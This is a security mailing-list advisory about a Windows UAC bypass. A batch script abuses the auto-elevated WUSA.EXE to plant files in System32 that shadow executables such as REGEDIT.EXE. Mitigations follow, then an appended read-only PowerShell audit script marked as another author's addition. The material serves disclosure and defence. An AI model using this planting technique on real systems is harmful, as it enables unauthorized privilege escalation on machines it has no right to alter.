Defense in depth -- the Microsoft way (part 31): UAC is for binary planting
Mar 15 2015 03:48PM
Stefan Kanthak (stefan kanthak nexgo de)
the exploit shown here should be well-known to every
Windows administrator, developer or QA engineer.
In Microsoft's own terms it doesn't qualify as a security
vulnerability since UAC is a security feature, not a
* a user running as "protected Administrator" on Windows 7
and newer with standard UAC settings.
JFTR: this is the default for "out-of-the-box" installations
and typically almost never changed!
* some executables in directory %SystemRoot%\, but not in
directory %SystemRoot%\System32\ (or %SystemRoot%\SysWoW64\);
JFTR: REGEDIT.EXE is one of these executables, and it has a
manifest which specifies
so users running as "protected Administrator" are
accustomed to the UAC prompt when they start REGEDIT.EXE
and will most probably acknowledge the privilege elevation.
Exploit (to be run as a batch script):

    for %%! in ("%SystemRoot%\*.exe" "%SystemRoot%\*.dll") do call :PLANT "%%~nx!"
    goto :EOF

    :PLANT
    rem names which already exist in System32 can't be shadowed: skip them
    if exist "%SystemRoot%\System32\%~1" goto :EOF
    rem create an empty file of that name and pack it into a .cab ...
    copy NUL: "%TEMP%\%~1"
    "%SystemRoot%\System32\makecab.exe" "%TEMP%\%~1" "%TEMP%\dummy.cab"
    rem ... which the auto-elevated WUSA.EXE then extracts into System32
    "%SystemRoot%\System32\wusa.exe" "%TEMP%\dummy.cab" /extract:"%SystemRoot%\System32"
    rem for executables: run the bare name; System32 is searched before %SystemRoot%
    if /I "%~x1" == ".exe" "%~1" /?
WUSA.EXE is one of about 70 Microsoft programs which have been
UAC-autoelevated since Windows 7, so the user doesn't need to
answer the UAC prompt when the batch script plants a file in
the directory "%SystemRoot%\System32\".
* set the UAC control to "ask always" (as it was in Windows Vista)
* remove the user accounts created during setup from the
"Administrators" group and place them in the "Users" group, i.e.
demote these accounts from "Administrator" to "Standard user".
Start->Run "control.exe userpasswords2" alias
"rundll32.exe netplwiz.dll,UsersRunDll" allows this operation!
JFTR: don't forget to enable the built-in "Administrator" account.
| There are three types of accounts. Each type gives you a different
| level of control over the PC:
| * Administrator accounts provide the most control over a PC, and
| should be used sparingly. You probably created this type of
| account when you first started using your PC.
| * Standard accounts are for everyday use. If you're setting up
| accounts for other people on your PC, it's a good idea to give
| them standard accounts.
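As an added, read-only audit (my own code, not part of the post): it checks the two conditions the exploit relies on, the UAC prompt level and membership in "Administrators", and lists every *.exe/*.dll in %SystemRoot% together with the signature state of any same-named twin in System32, which is where a planted copy would sit. It assumes PowerShell 3 or newer on Windows 7+; the function names are mine.

```powershell
# Added audit script, not part of the original post. Assumes PowerShell 3 or
# newer on Windows 7+ and read access to %SystemRoot%; it modifies nothing.
# Function names (Get-UacState, Get-ShadowedSystemRootBinaries) are my own.

function Get-UacState {
    # UAC policy values behind the post's first mitigation ("ask always").
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key
    $id  = [Security.Principal.WindowsIdentity]::GetCurrent()
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        # 2 = "Always notify" (the Vista behaviour), 5 = Windows 7+ default
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        AlwaysNotify               = ($p.EnableLUA -eq 1 -and $p.ConsentPromptBehaviorAdmin -eq 2)
        # Token groups include deny-only SIDs, so this stays true for a
        # "protected Administrator" whose token is filtered (not elevated).
        InAdministratorsGroup      = [bool]($id.Groups -contains 'S-1-5-32-544')
        TokenElevated              = ([Security.Principal.WindowsPrincipal]$id).IsInRole(
                                        [Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

function Get-ShadowedSystemRootBinaries {
    # Every *.exe/*.dll in %SystemRoot% without a same-named file in System32 is
    # a planting target, because System32 precedes %SystemRoot% on the PATH.
    # A tiny, unsigned twin in System32 is the pattern to triage.
    $root = $env:SystemRoot
    Get-ChildItem -Path "$root\*" -Include '*.exe', '*.dll' -File | ForEach-Object {
        $twin = Join-Path $root "System32\$($_.Name)"
        $o = [ordered]@{
            Name = $_.Name; TwinInSystem32 = (Test-Path -LiteralPath $twin)
            TwinSize = $null; TwinSignature = $null
        }
        if ($o.TwinInSystem32) {
            $o.TwinSize      = (Get-Item -LiteralPath $twin).Length
            $o.TwinSignature = (Get-AuthenticodeSignature -FilePath $twin).Status
        }
        [pscustomobject]$o
    }
}

Get-UacState | Format-List
# Rows without a twin are the exposed names; rows whose twin is not validly
# signed deserve a look (valid Microsoft signatures on both copies are normal).
Get-ShadowedSystemRootBinaries |
    Where-Object { $_.TwinSignature -ne 'Valid' } |
    Format-Table -AutoSize
```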